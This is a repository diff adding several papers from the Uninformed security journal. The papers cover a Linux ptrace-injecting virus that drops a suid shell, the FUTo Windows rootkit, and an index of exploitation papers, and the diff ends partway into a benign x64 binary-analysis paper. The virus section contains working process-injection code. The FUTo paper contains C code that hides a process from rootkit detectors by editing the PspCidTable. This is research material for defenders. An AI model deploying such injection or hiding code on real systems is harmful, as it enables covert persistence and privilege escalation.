if (ptrace(PTRACE_DETACH, pid, NULL, NULL) < 0) {
|
||||
perror("Oopsie");
|
||||
return -1;
|
||||
}
|
||||
|
||||
printf("pid #%d got infected!\n", pid);
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
// Injection Function
|
||||
|
||||
int ptrace_inject(pid_t pid, long memaddr, void *buf, int buflen) {
|
||||
|
||||
long data;
|
||||
|
||||
while (buflen > 0) {
|
||||
memcpy(&data, buf, 4);
|
||||
|
||||
if ( ptrace(PTRACE_POKETEXT, pid, memaddr, data) < 0 ) {
|
||||
perror("Oopsie!");
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
memaddr += 4;
|
||||
buf += 4;
|
||||
buflen -= 4;
|
||||
}
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
A few pointers about the code:
|
||||
|
||||
The virus assembly parts were written as one chunk, the pre-virus
|
||||
code is located in the top and the virus code in the bottom. It is
|
||||
also written in shellcode programming style, which produces a NULL
|
||||
free and somewhat optimized code. As this chunk has been injected
|
||||
into the infected process, it keeps the virus as small as possible,
|
||||
which always is a good idea.
|
||||
|
||||
The virus code assumes it will run more than once inside a given
|
||||
infected process. This means that self modifying code actions such
|
||||
as fixing NULLs in runtime, first checks if it is needed in the
|
||||
current virus iteration.
|
||||
|
||||
The virus itself is programmed to drop a suid shell called
|
||||
/tmp/fluffy. Before doing so, it will check if the file
|
||||
exists, and if that is not the case, it will execve() a
|
||||
small hardcoded shell script to generate a suid wrapper. Iteration
|
||||
occurs every 14 secs.
|
||||
|
||||
The signal() syscall has a habit of restarting the signal handler to
|
||||
default after it has been called. This means the virus has to
|
||||
re-register to the signal every time. An alternative solution is to
|
||||
setup the signal handler using other signal related syscalls such as
|
||||
sigaction() or rtsigaction() which is how the libc signal() function
|
||||
is implemented. Choosing signal() over these syscalls was based on
|
||||
size related issues.
|
||||
|
||||
|
||||
5.3) Further Design Issues
|
||||
|
||||
Aside of what concerns the code itself:
|
||||
|
||||
Injecting to the previous stack page top address is a safety move to
|
||||
assure the virus code won't overwrite any program related data on
|
||||
the stack. Testing the virus on the syslogd daemon showed that this
|
||||
make sense, as the syslogd at some point managed to partly overwrite
|
||||
the virus code. A common pitfall is NULLs, as two NULLs overwrite
|
||||
(e.g. \x00\x00) creates a valid assembly instruction ADD AL,(EAX)
|
||||
which easily leads to a crash.
|
||||
|
||||
Apart from the stack it is possible to inject the code to the .text
|
||||
section itself. As on x86IA32, pages are 4k aligned and the program
|
||||
code itself might not fill up the entire page. The gap created often
|
||||
is referred to as "cave", and it is an ideal place to park the virus
|
||||
assuming of course the virus is small enough to get into it. But due
|
||||
to nature of the .text section, which is not writable, the
|
||||
virus will require to issue mprotect() on the current page
|
||||
to perform self modifying actions on itself.
|
||||
|
||||
An easy way to find a suitable process to infect using an automatic
|
||||
approach, would be to start an attachment loop starting from the pid
|
||||
zero and onward. As the system boots and enters init 3 (e.g.
|
||||
multiuser) a series of daemons are being launched. Due to the timing
|
||||
of these daemons, their pids would be closer to zero, an example for
|
||||
such would be crond, syslogd and inetd.
|
||||
|
||||
|
||||
6) Conclusion
|
||||
|
||||
Implementation of a userland scheduler code allows to run an external
|
||||
code in a perfect harmony with the existing code. Taking an exploit
|
||||
scenario from any kind and adding this feature to it, can turn a normal
|
||||
straight forward shellcode to a backdoor and more.
|
||||
|
||||
|
||||
References:
|
||||
|
||||
[1] Building ptrace Injecting Shellcodes
|
||||
anonymous
|
||||
http://www.phrack.org/show.php?p=59&a=12;
|
||||
accessed December 29, 2005.
|
||||
|
||||
|
||||
|
379
uninformed/3.6.txt
Normal file
379
uninformed/3.6.txt
Normal file
|
@ -0,0 +1,379 @@
|
|||
FUTo
|
||||
Peter Silberman & C.H.A.O.S.
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract:
|
||||
|
||||
Since the introduction of FU, the rootkit world has moved away from
|
||||
implementing system hooks to hide their presence. Because of this change
|
||||
in offense, a new defense had to be developed. The new algorithms used
|
||||
by rootkit detectors, such as BlackLight, attempt to find what the
|
||||
rootkit is hiding instead of simply detecting the presence of the
|
||||
rootkit's hooks. This paper will discuss an algorithm that is used by
|
||||
both Blacklight and IceSword to detect hidden processes. This paper will
|
||||
also document current weaknesses in the rootkit detection field and
|
||||
introduce a more complete stealth technique implemented as a prototype
|
||||
in FUTo.
|
||||
|
||||
Thanks:
|
||||
|
||||
Peter would like to thank bugcheck, skape, thief, pedram, F-Secure for
|
||||
doing great research, and all the nologin/research'ers who encourage
|
||||
mind growth.
|
||||
|
||||
C.H.A.O.S. would like to thank Amy, Santa (this work was three hours on
|
||||
Christmas day), lonerancher, Pedram, valerino, and HBG Unit.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
In the past year or two, there have been several major developments in
|
||||
the rootkit world. Recent milestones include the introduction of the FU
|
||||
rootkit, which uses Direct Kernel Object Manipulation (DKOM); the
|
||||
introduction of VICE, one of the first rootkit detection programs; the
|
||||
birth of Sysinternals' Rootkit Revealer and F-Secure's Blacklight, the
|
||||
first mainstream Windows rootkit detection tools; and most recently the
|
||||
introduction of Shadow Walker, a rootkit that hooks the memory manager
|
||||
to hide in plain sight.
|
||||
|
||||
Enter Blacklight and IceSword. The authors chose to investigate the
|
||||
algorithms used by both Blacklight and IceSword because they are
|
||||
considered by many in the field to be the best detection tools.
|
||||
Blacklight, developed by the Finnish security company F-Secure, is
|
||||
primarily concerned with detecting hidden processes. It does not attempt
|
||||
to detect system hooks; it is only concerned with hidden processes.
|
||||
IceSword uses a very similar method to Blacklight. IceSword
|
||||
differentiates itself from Blacklight in that it is a more robust tool
|
||||
allowing the user to see what system calls are hooked, what drivers are
|
||||
hidden, and what TCP/UDP ports are open that programs, such as netstat,
|
||||
do not.
|
||||
|
||||
|
||||
3) Blacklight
|
||||
|
||||
This paper will focus primarily on Blacklight due to its algorithm being
|
||||
the research focus for this paper. Also, it became apparent after
|
||||
researching Blacklight that IceSword used a very similiar algorithm.
|
||||
Therefore, if a weakness was found in Blacklight, it would most likely
|
||||
exist in IceSword as well.
|
||||
|
||||
Blacklight takes a userland approach to detecting processes. Although
|
||||
simplistic, its algorithm is amazingly effective. Blacklight uses some
|
||||
very strong anti-debugging features that begin by creating a Thread
|
||||
Local Storage (TLS) callback table. Blacklight's TLS callback attempts
|
||||
to befuddle debuggers by forking the main process before the process
|
||||
object is fully created. This can occur because the TLS callback routine
|
||||
is called before the process is completely initialized. Blacklight also
|
||||
has anti-debugging measures that detect the presence of debuggers
|
||||
attaching to it. Rather than attempting to beat the anti-debugging
|
||||
measures by circumventing the TLS callback and making other program
|
||||
modifications, the authors decided to just disable the TLS routine. To
|
||||
do this, the authors used a tool called LordPE. LordPE allows users to
|
||||
edit PE files. The authors used this tool to zero out the TLS callback
|
||||
table. This disabled the forking routine and gave the authors the
|
||||
ability to use an API Monitor. It should be noted that disabling the
|
||||
callback routine would allow you to attach a debugger, but when the user
|
||||
clicked "scan" in the Blacklight GUI Blacklight would detect the
|
||||
debugger and exit. Instead of working up a second measure to circumvent
|
||||
the anti-debugging routines, the authors decided to analyze the calls
|
||||
occuring within Blacklight. To this end, the authors used Rohitabs API
|
||||
Monitor.
|
||||
|
||||
In testing, one can see failed calls to the API OpenProcess (tls zero is
|
||||
Blacklight without a TLS table). Blacklight tries opening a process with
|
||||
process id (PID) of 0x1CC, 0x1D0, 0x1D4, 0x1D8 and so on. The authors
|
||||
dubbed the method Blacklight uses as PID Bruteforce (PIDB). Blacklight
|
||||
loops through all possible PIDS calling OpenProcess on the PIDs in the
|
||||
range of 0x0 to 0x4E1C. Blacklight keeps a list of all processes it is
|
||||
able to open, using the PIDB method. Blacklight then calls
|
||||
CreateToolhelp32Snapshot, which gives Blacklight a second list of
|
||||
processes. Blacklight then compares the two lists, to see if there are
|
||||
any processes in the PIDB list that are not in the list returned by the
|
||||
CreateToolhelp32Snapshot function. If there is any discrepancy, these
|
||||
processes are considered hidden and reported to the user.
|
||||
|
||||
|
||||
3.1) Windows OpenProcess
|
||||
|
||||
In Windows, the OpenProcess function is a wrapper to the NtOpenProcess
|
||||
routine. NtOpenProcess is implemented in the kernel by NTOSKRNL.EXE. The
|
||||
function prototype for NtOpenProcess is:
|
||||
|
||||
NTSTATUS NtOpenProcess (
|
||||
OUT PHANDLE ProcessHandle,
|
||||
IN ACCESS_MASK DesiredAccess,
|
||||
IN POBJECT_ATTRIBUTES ObjectAttributes,
|
||||
IN PCLIENT_ID ClientId OPTIONAL);
|
||||
|
||||
The ClientId parameter is the actual PID that is passed by OpenProcess.
|
||||
This parameter is optional, but during our observation the OpenProcess
|
||||
function always specified a ClientId when calling NtOpenProcess.
|
||||
|
||||
NtOpenProcess performs three primary functions:
|
||||
|
||||
1. It verifies the process exists by calling PsLookupProcessByProcessId.
|
||||
2. It attempts to open a handle to the process by calling
|
||||
ObOpenObjectByPointer.
|
||||
3. If it was successful opening a handle to the process, it passes the
|
||||
handle back to the caller.
|
||||
|
||||
PsLookupProcessByProcessId was the next obvious place for research. One
|
||||
of the outstanding questions was how does PsLookupProcessByProcessId
|
||||
know that a given PID is part of a valid process? The answer becomes
|
||||
clear in the first few lines of the disassembly:
|
||||
|
||||
PsLookupProcessByProcessId:
|
||||
mov edi, edi
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
push ebx
|
||||
push esi
|
||||
mov eax, large fs:124h
|
||||
push [ebp+arg_4]
|
||||
mov esi, eax
|
||||
dec dword ptr [esi+0D4h]
|
||||
push PspCidTable
|
||||
call ExMapHandleToPointer
|
||||
|
||||
From the above disassembly, it is clear that ExMapHandleToPointer
|
||||
queries the PspCidTable for the process ID.
|
||||
|
||||
Now we have a complete picture of how Blacklight detects hidden processes:
|
||||
|
||||
1. Blacklight starts looping through the range of valid process IDs, 0
|
||||
through 0x41DC.
|
||||
2. Blacklight calls OpenProcess on every possible PID.
|
||||
3. OpenProcess calls NtOpenProcess.
|
||||
4. NtOpenProcess calls PsLookupProcessByProcessId to verify the
|
||||
process exists.
|
||||
5. PsLookupProcessByProcessId uses the PspCidTable to verify the
|
||||
processes exists.
|
||||
6. NtOpenProcess calls ObOpenObjectByPointer to get the handle to the
|
||||
process.
|
||||
7. If OpenProcess was successful, Blacklight stores the information
|
||||
about the process and continues to loop.
|
||||
8. Once the process list has been created by exhausting all possible
|
||||
PIDs. Blacklight compares the PIDB list with the list it creates by
|
||||
calling CreateToolhelp32Snapshot. CreateToolhelp32Snapshot is a Win32
|
||||
API that takes a snapshot of all running processes on the system. A
|
||||
discrepancy between the two lists implies that there is a hidden
|
||||
process. This case is reported by Blacklight.
|
||||
|
||||
|
||||
3.2) The PspCidTable
|
||||
|
||||
The PspCidTable is a "handle table for process and thread client IDs".
|
||||
Every process' PID corresponds to its location in the PspCidTable. The
|
||||
PspCidTable is a pointer to a HANDLE_TABLE structure.
|
||||
|
||||
typedef struct _HANDLE_TABLE {
|
||||
PVOID p_hTable;
|
||||
PEPROCESS QuotaProcess;
|
||||
PVOID UniqueProcessId;
|
||||
EX_PUSH_LOCK HandleTableLock [4];
|
||||
LIST_ENTRY HandleTableList;
|
||||
EX_PUSH_LOCK HandleContentionEvent;
|
||||
PHANDLE_TRACE_DEBUG_INFO DebugInfo;
|
||||
DWORD ExtraInfoPages;
|
||||
DWORD FirstFree;
|
||||
DWORD LastFree;
|
||||
DWORD NextHandleNeedingPool;
|
||||
DWORD HandleCount;
|
||||
DWORD Flags;
|
||||
};
|
||||
|
||||
Windows offers a variety of non-exported functions to manipulate and retrieve
|
||||
information from the PspCidTable. These include:
|
||||
|
||||
- [ExCreateHandleTable] creates non-process handle tables. The
|
||||
objects within all handle tables except the PspCidTable are pointers
|
||||
to object headers and not the address of the objects themselves.
|
||||
- [ExDupHandleTable] is called when spawning a process.
|
||||
- [ExSweepHandleTable] is used for process rundown.
|
||||
- [ExDestroyHandleTable] is called when a process is exiting.
|
||||
- [ExCreateHandle] creates new handle table entries.
|
||||
- [ExChangeHandle] is used to change the access mask on a handle.
|
||||
- [ExDestroyHandle] implements the functionality of CloseHandle.
|
||||
- [ExMapHandleToPointer] returns the address of the object corresponding to the handle.
|
||||
- [ExReferenceHandleDebugIn] tracing handles.
|
||||
- [ExSnapShotHandleTables] is used for handle searchers (for example in oh.exe).
|
||||
|
||||
Below is code that uses non-exported functions to remove a process
|
||||
object from the PspCidTable. It uses hardcoded addresses for the
|
||||
non-exported functions necessary; however, a rootkit could find these
|
||||
function addresses dynamically.
|
||||
|
||||
typedef PHANDLE_TABLE_ENTRY (*ExMapHandleToPointerFUNC)
|
||||
( IN PHANDLE_TABLE HandleTable,
|
||||
IN HANDLE ProcessId);
|
||||
|
||||
void HideFromBlacklight(DWORD eproc)
|
||||
{
|
||||
PHANDLE_TABLE_ENTRY CidEntry;
|
||||
ExMapHandleToPointerFUNC map;
|
||||
ExUnlockHandleTableEntryFUNC umap;
|
||||
PEPROCESS p;
|
||||
CLIENT_ID ClientId;
|
||||
|
||||
map = (ExMapHandleToPointerFUNC)0x80493285;
|
||||
|
||||
CidEntry = map((PHANDLE_TABLE)0x8188d7c8,
|
||||
LongToHandle( *((DWORD*)(eproc+PIDOFFSET)) ) );
|
||||
if(CidEntry != NULL)
|
||||
{
|
||||
CidEntry->Object = 0;
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
Since the job of the PspCidTable is to keep track of all the processes
|
||||
and threads, it is logical that a rootkit detector could use the
|
||||
PspCidTable to find hidden processes. However, relying on a single data
|
||||
structure is not a very robust algorithm. If a rootkit alters this one
|
||||
data structure, the operating system and other programs will have no
|
||||
idea that the hidden process exists. New rootkit detection algorithms
|
||||
should be devised that have overlapping dependencies so that a single
|
||||
change will not go undetected.
|
||||
|
||||
|
||||
4) FUTo
|
||||
|
||||
To demonstrate the weaknesses in the algorithms currently used by
|
||||
rootkit detection software such as Blacklight and Icesword, the authors
|
||||
have created FUTo. FUTo is a new version of the FU rootkit. FUTo has
|
||||
the added ability to manipulate the PspCidTable without using any
|
||||
function calls. It uses DKOM techniques to hide particular objects
|
||||
within the PspCidTable.
|
||||
|
||||
There were some design considerations when implementing the new features
|
||||
in FUTo. The first was that, like the ExMapHandleXXX functions, the
|
||||
PspCidTable is not exported by the kernel. In order to overcome this,
|
||||
FUTo automatically detects the PspCidTable by finding the
|
||||
PsLookupProcessByProcessId function and disassembling it looking for the
|
||||
first function call. At the time of this writing, the first function
|
||||
call is always to ExMapHandleToPointer. ExMapHandleToPointer takes the
|
||||
PspCidTable as its first parameter. Using this knowledge, it is fairly
|
||||
straightforward to find the PspCidTable.
|
||||
|
||||
PsLookupProcessByProcessId:
|
||||
mov edi, edi
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
push ebx
|
||||
push esi
|
||||
mov eax, large fs:124h
|
||||
push [ebp+arg_4]
|
||||
mov esi, eax
|
||||
dec dword ptr [esi+0D4h]
|
||||
push PspCidTable
|
||||
call ExMapHandleToPointer
|
||||
|
||||
A more robust method to find the PspCidTable could be written as this
|
||||
algorithm will fail if even simple compiler optimizations are made on
|
||||
the kernel. Opc0de wrote a more robust method to detect non-exported
|
||||
variables like PspCidTable, PspActiveProcessHead, PspLoadedModuleList,
|
||||
etc. Opc0des method does not requires memory scanning like the method
|
||||
currently used in FUTo. Instead Opc0de found that the KdVersionBlock
|
||||
field in the Process Control Region structure pointed to a structure
|
||||
KDDEBUGGER_DATA32. The structure looks like this:
|
||||
|
||||
typedef struct _KDDEBUGGER_DATA32 {
|
||||
|
||||
DBGKD_DEBUG_DATA_HEADER32 Header;
|
||||
ULONG KernBase;
|
||||
ULONG BreakpointWithStatus; // address of breakpoint
|
||||
ULONG SavedContext;
|
||||
USHORT ThCallbackStack; // offset in thread data
|
||||
USHORT NextCallback; // saved pointer to next callback frame
|
||||
USHORT FramePointer; // saved frame pointer
|
||||
USHORT PaeEnabled:1;
|
||||
ULONG KiCallUserMode; // kernel routine
|
||||
ULONG KeUserCallbackDispatcher; // address in ntdll
|
||||
|
||||
ULONG PsLoadedModuleList;
|
||||
ULONG PsActiveProcessHead;
|
||||
ULONG PspCidTable;
|
||||
|
||||
ULONG ExpSystemResourcesList;
|
||||
ULONG ExpPagedPoolDescriptor;
|
||||
ULONG ExpNumberOfPagedPools;
|
||||
|
||||
[...]
|
||||
|
||||
ULONG KdPrintCircularBuffer;
|
||||
ULONG KdPrintCircularBufferEnd;
|
||||
ULONG KdPrintWritePointer;
|
||||
ULONG KdPrintRolloverCount;
|
||||
|
||||
ULONG MmLoadedUserImageList;
|
||||
|
||||
} KDDEBUGGER_DATA32, *PKDDEBUGGER_DATA32;
|
||||
|
||||
As the reader can see the structure contains pointers to many of the
|
||||
commonly needed/used non-exported variables. This is one more robust
|
||||
method to finding the PspCidTable and other variables like it.
|
||||
|
||||
The second design consideration was a little more troubling. When FUTo
|
||||
removes an object from the PspCidTable, the HANDLE_ENTRY is replaced with
|
||||
NULLs representing the fact that the process "does not exist." The
|
||||
problem then occurs when the process that is hidden (and has no
|
||||
PspCidTable entries) is closed. When the system tries to close the
|
||||
process, it will index into the PspCidTable and dereference a null
|
||||
object causing a blue screen. The solution to this problem is simple but
|
||||
not elegant. First, FUTo sets up a process notify routine by calling
|
||||
PsSetCreateProcessNotifyRoutine. The callback function will be invoked
|
||||
whenever a process is created, but more importantly it will be called
|
||||
whenever a process is deleted. The callback executes before the hidden
|
||||
process is terminated; therefore, it gets called before the system
|
||||
crashes. When FUTo deletes the indexes that contain objects that point
|
||||
to the rogue process, FUTo will save the value of the HANDLE_ENTRYs and
|
||||
the index for later use. When the process is closed, FUTo will restore
|
||||
the objects before the process is closed allowing the system to
|
||||
dereference valid objects.
|
||||
|
||||
5) Conclusion
|
||||
|
||||
The catch phrase in 2005 was, ``We are raising the bar [again] for
|
||||
rootkit detection''. Hopefully the reader has walked away with a better
|
||||
understanding of how the top rootkit detection programs are detecting
|
||||
hidden processes and how they can be improved. Some readers may ask
|
||||
"What can I do?" Well, the simple solution is not to connect to the
|
||||
Internet, but a combination of using both Blacklight, IceSword and
|
||||
Rootkit Revealer will greatly help your chances of staying rootkit free.
|
||||
A new tool called RAIDE (Rootkit Analysis Identification Elimination)
|
||||
will be unveiled in the coming months at Blackhat Amsterdam. This new
|
||||
tool does not suffer from the problems brought forth here.
|
||||
|
||||
Bibliography
|
||||
|
||||
Blacklight Homepage. F-Secure Blacklight
|
||||
http://www.f-secure.com/blacklight/
|
||||
|
||||
|
||||
FU Project Page. FU
|
||||
http://www.rootkit.com/project.php?id=12
|
||||
|
||||
|
||||
IceSword Homepage. IceSword
|
||||
http://www.xfocus.net/tools/200505/1032.html
|
||||
|
||||
|
||||
LordPE Homepage. LordPE Info
|
||||
http://mitglied.lycos.de/yoda2k/LordPE/info.htm
|
||||
|
||||
|
||||
Opc0de. 2005. How to get some hidden kernel variables without scanning
|
||||
http://www.rootkit.com/newsread.php?newsid=101
|
||||
|
||||
|
||||
Rohitabs API Monitor. API Monitor - Spy on API calls
|
||||
http://www.rohitab.com/apimonitor/
|
||||
|
||||
|
||||
Russinovich, Solomon. Microsoft Windows Internals Fourth Edition.
|
||||
|
||||
|
||||
Silberman. RAIDE:Rootkit Analysis Identification Elimination
|
||||
http://www.blackhat.com/html/bh-europe-06/bh-eu-06-speakers.htmlSilberman
|
35
uninformed/3.txt
Normal file
35
uninformed/3.txt
Normal file
|
@ -0,0 +1,35 @@
|
|||
Engineering in Reverse
|
||||
Bypassing PatchGuard on Windows x64
|
||||
skape & Skywing
|
||||
The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested.
|
||||
pdf | txt | html
|
||||
|
||||
Exploitation Technology
|
||||
Windows Kernel-mode Payload Fundamentals
|
||||
bugcheck & skape
|
||||
This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.
|
||||
pdf | txt | html
|
||||
|
||||
Fuzzing
|
||||
Analyzing Common Binary Parser Mistakes
|
||||
Orlando Padilla
|
||||
With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it all is unfortunate; no one cares enough. These bugs have been around for some time now, but have only recently gained media attention due to the large number of vulnerabilities being released. Researchers have been finding more elaborate and passive attack vectors for these bugs, some of which can even leverage a remote compromise.
|
||||
pdf | txt | code.tgz | html
|
||||
|
||||
General Research
|
||||
Attacking NTLM with Precomputed Hashtables
|
||||
Warlord
|
||||
Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with Microsoft's Windows being no exception. Due to errors in the design of the password encryption scheme, especially in the LanMan(LM) scheme, Windows has a bad track in this field of information security. Especially in the last couple of years, where the outdated DES encryption algorithm that LanMan is based on faced more and more processing power in the average household, combined with ever increasing harddisk size, made it crystal clear that LanMan nowadays is not just outdated, but even antiquated.
|
||||
pdf | txt | html
|
||||
|
||||
Linux Improvised Userland Scheduler Virus
|
||||
Izik
|
||||
This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to invading into other processes, and the userland scheduler provides a way to make the injected code coexist with the original process code. This allows the virus to remain stealthy and active inside an infected process.
|
||||
pdf | txt | html
|
||||
|
||||
Rootkit Technology
|
||||
FUTo
|
||||
Peter Silberman & C.H.A.O.S.
|
||||
Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms used by rootkit detectors, such as BlackLight, attempt to find what the rootkit is hiding instead of simply detecting the presence of the rootkit's hooks. This paper will discuss an algorithm that is used by both Blacklight and IceSword to detect hidden processes. This paper will also document current weaknesses in the rootkit detection field and introduce a more complete stealth technique implemented as a prototype in FUTo.
|
||||
pdf | txt | code.tgz | html
|
||||
|
686
uninformed/4.4.txt
Normal file
686
uninformed/4.4.txt
Normal file
|
@ -0,0 +1,686 @@
|
|||
Improving Automated Analysis of Windows x64 Binaries
|
||||
April 2006
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: As Windows x64 becomes a more prominent platform, it will
|
||||
become necessary to develop techniques that improve the binary analysis
|
||||
process. In particular, automated techniques that can be performed
|
||||
prior to doing code or data flow analysis can be useful in getting a
|
||||
better understanding for how a binary operates. To that point, this
|
||||
paper gives a brief explanation of some of the changes that have been
|
||||
made to support Windows x64 binaries. From there, a few basic
|
||||
techniques are illustrated that can be used to improve the process of
|
||||
identifying functions, annotating their stack frames, and describing
|
||||
their exception handler relationships. Source code to an example IDA
|
||||
plugin is also included that shows how these techniques can be
|
||||
implemented.
|
||||
|
||||
Thanks: The author would like to thank bugcheck, sh0k, jt, spoonm, and
|
||||
Skywing.
|
||||
|
||||
Update: The article in MSDN magazine by Matt Pietrek was
|
||||
published after this article was written. However, it contains a
|
||||
lot of useful information and touches on many of the same topics
|
||||
that this article covers in the background chapter. The article can
|
||||
be found here:
|
||||
http://msdn.microsoft.com/msdnmag/issues/06/05/x64/default.aspx.
|
||||
|
||||
With that, on with the show
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
The demand for techniques that can be used to improve the analysis
|
||||
process of Windows x64 binaries will only increase as the Windows x64
|
||||
platform becomes more accepted and used in the market place. There is a
|
||||
deluge of useful information surrounding techniques that can be used to
|
||||
perform code and data flow analysis that is also applicable to the x64
|
||||
architecture. However, techniques that can be used to better annotate
|
||||
and streamline the initial analysis phases, such as identifying
|
||||
functions and describing their stack frames, is still a ripe area for
|
||||
improvement at the time of this writing. For that reason, this paper
|
||||
will start by describing some of the changes that have been made to
|
||||
support Windows x64 binaries. This background information is useful
|
||||
because it serves as a basis for understanding a few basic techniques
|
||||
that may be used to improve some of the initial analysis phases. During
|
||||
the course of this paper, the term Windows x64 binary will simply be
|
||||
reduced to x64 binary in the interest of brevity.
|
||||
|
||||
|
||||
3) Background
|
||||
|
||||
Prior to diving into some of the analysis techniques that can be
|
||||
performed on x64 binaries, it's first necessary to learn a bit about
|
||||
some of the changes that were made to support the x64 architecture.
|
||||
This chapter will give a very brief explanation of some of the things
|
||||
that have been introduced, but will by no means attempt to act as an
|
||||
authoritative reference.
|
||||
|
||||
|
||||
3.1) PE32+ Image File Format
|
||||
|
||||
The image file format for the x64 platform is known as PE32+. As one
|
||||
would expect, the file format is derived from the PE file format with
|
||||
only very slight modifications. For instance, 64-bit binaries contain
|
||||
an IMAGE_OPTIONAL_HEADER64 rather than an IMAGE_OPTIONAL_HEADER. The
|
||||
differences between these two structures are described in the table
|
||||
below:
|
||||
|
||||
Field | PE | PE32+
|
||||
-------------------+-------+------------------------------
|
||||
BaseOfData | ULONG | Removed from structure
|
||||
ImageBase | ULONG | ULONGLONG
|
||||
SizeOfStackReserve | ULONG | ULONGLONG
|
||||
SizeOfStackCommit | ULONG | ULONGLONG
|
||||
SizeOfHeapReserve | ULONG | ULONGLONG
|
||||
SizeOfHeapCommit | ULONG | ULONGLONG
|
||||
-------------------+-------+------------------------------
|
||||
|
||||
In general, any structure attribute in the PE image that made reference
|
||||
to a 32-bit virtual address directly rather than through an RVA (Relative
|
||||
Virtual Address) has been expanded to a 64-bit attribute in PE32+. Other
|
||||
examples of this include the IMAGE_TLS_DIRECTORY structure and the
|
||||
IMAGE_LOAD_CONFIG_DIRECTORY structure.
|
||||
|
||||
With the exception of certain field offsets in specific structures,
|
||||
the PE32+ image file format is largely backward compatible with PE
|
||||
both in use and in form.
|
||||
|
||||
|
||||
3.2) Calling Convention
|
||||
|
||||
The calling convention used on x64 is much simpler than those used for
|
||||
x86. Unlike x86, where calling conventions like stdcall, cdecl, and
|
||||
fastcall are found, the x64 platform has only one calling convention.
|
||||
The calling convention that it uses is a derivative of fastcall where
|
||||
the first four parameters of a function are passed by register and any
|
||||
remaining parameters are passed through the stack. Each parameter is 64
|
||||
bits wide (8 bytes). The first four parameters are passed through the
|
||||
RCX, RDX, R8, and R9 registers, respectively. For scenarios where
|
||||
parameters are passed by value or are otherwise too large to fit into
|
||||
one of the 64-bit registers, appropriate steps are taken as documented
|
||||
in [4].
|
||||
|
||||
|
||||
3.2.1) Stack Frame Layout
|
||||
|
||||
The stack frame layout for functions on x64 is very similar to x86, but
|
||||
with a few key differences. Just like x86, the stack frame on x64 is
|
||||
divided into three parts: parameters, return address, and locals. These
|
||||
three parts are explained individually below. One of the important
|
||||
principals to understand when it comes to x64 stack frames is that the
|
||||
stack does not fluctuate throughout the course of a given function. In
|
||||
fact, the stack pointer is only permitted to change in the context of a
|
||||
function prologue. Note that things like alloca are handled in a special
|
||||
manner[7]. Parameters are not pushed and popped from the stack. Instead,
|
||||
stack space is pre-allocated for all of the arguments that would be
|
||||
passed to child functions. This is done, in part, for making it easier
|
||||
to unwind call stacks in the event of an exception. The table below
|
||||
describes a typical stack frame:
|
||||
|
||||
|
||||
+-------------------------+
|
||||
| Stack parameter area |
|
||||
+-------------------------+
|
||||
| Register parameter area |
|
||||
+-------------------------+
|
||||
| Return address |
|
||||
+-------------------------+
|
||||
| Locals |
|
||||
+-------------------------+
|
||||
|
||||
|
||||
== Parameters
|
||||
|
||||
|
||||
The calling convention for functions on x64 dictates that the first four
|
||||
parameters are passed via register with any remaining parameters,
|
||||
starting with parameter five, spilling to the stack. Given that the
|
||||
fifth parameter is the first parameter passed by the stack, one would
|
||||
think that the fifth parameter would be the value immediately adjacent
|
||||
to the return address on the stack, but this is not the case. Instead,
|
||||
if a given function calls other functions, that function is required to
|
||||
allocate stack space for the parameters that are passed by register.
|
||||
This has the affect of making it such that the area of the stack
|
||||
immediately adjacent to the return address is 0x20 bytes of
|
||||
uninitialized storage for the parameters passed by register followed
|
||||
immediately by any parameters that spill to the stack (starting with
|
||||
parameter five). The area of storage allocated on the stack for the
|
||||
register parameters is known as the register parameter area whereas the
|
||||
area of the stack for parameters that spill onto the stack is known as
|
||||
the stack parameter area. The table below illustrates what the
|
||||
parameter portion of a stack frame would look like after making a call
|
||||
to a function:
|
||||
|
||||
+-------------------------+
|
||||
| Parameter 6 |
|
||||
+-------------------------+
|
||||
| Parameter 5 |
|
||||
+-------------------------+
|
||||
| Parameter 4 (R9 Home) |
|
||||
+-------------------------+
|
||||
| Parameter 3 (R8 Home) |
|
||||
+-------------------------+
|
||||
| Parameter 2 (RDX Home) |
|
||||
+-------------------------+
|
||||
| Parameter 1 (RCX Home) |
|
||||
+-------------------------+
|
||||
| Return address |
|
||||
+-------------------------+
|
||||
|
||||
|
||||
To emphasize further, the register parameter area is always allocated,
|
||||
even if the function being called has fewer than four arguments. This
|
||||
area of the stack is effectively owned by the called function, and as
|
||||
such can be used for volatile storage during the course of the function
|
||||
call. In particular, this area is commonly used to persist the values
|
||||
of register parameters. This area is also referred to as the ``home''
|
||||
address for register parameters. However, it can also be used to save
|
||||
non-volatile registers. To someone familiar with x86 it may seem
|
||||
slightly odd to see functions modifying areas of the stack beyond the
|
||||
